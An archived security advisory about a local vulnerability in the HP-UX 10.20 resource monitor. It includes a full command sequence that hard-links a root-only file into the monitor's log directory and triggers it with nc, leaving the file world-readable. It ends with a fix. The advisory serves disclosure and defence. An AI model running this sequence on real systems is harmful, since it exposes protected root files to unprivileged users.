TUCoPS :: HP/UX :: resmon.htm

TUCoPS :: HP/UX :: resmon.htm
HP-UX 10.20 resource monitor - change any file to mode 644

Vulnerability

    resource monitor

Affected

    HpUX 10.20

Description

    J.A. Gutierrez found following.  On HP-UX 10.20 you can change any
    file on the root partition to mode 644:

        $ uname -sr
        HP-UX B.10.20
        $ cd /etc/opt/resmon/log
        $ mv registrar.log registrar.log.orig
        $ ls -l /.sh_history
        -rw-------   1 root       sys           3316 Sep 20 15:22 /.sh_history
        $ ln /.sh_history registrar.log
        $ nc hpux.example.com 1712 < /etc/motd
        $ ls -l /.sh_history
        -rw-r--r--   2 root       sys           3605 Nov  8 09:45 /.sh_history
        $ rm -f registrar.log
        $ mv registrar.log.orig registrar.log

    So, /.sh_history becomes world readable, and text similar to

        Event 382 occurred at Wed Nov  8 09:45:28.818524 2000
        Process ID: 10931 (/etc/opt/resmon/lbin/registrar)   Log Level: Error
        _rm_recv: Couldn't malloc 1073803312 bytes for receive buffer

    gets appended to it.

Solution

    Upgrade to EMS A.03.20 release.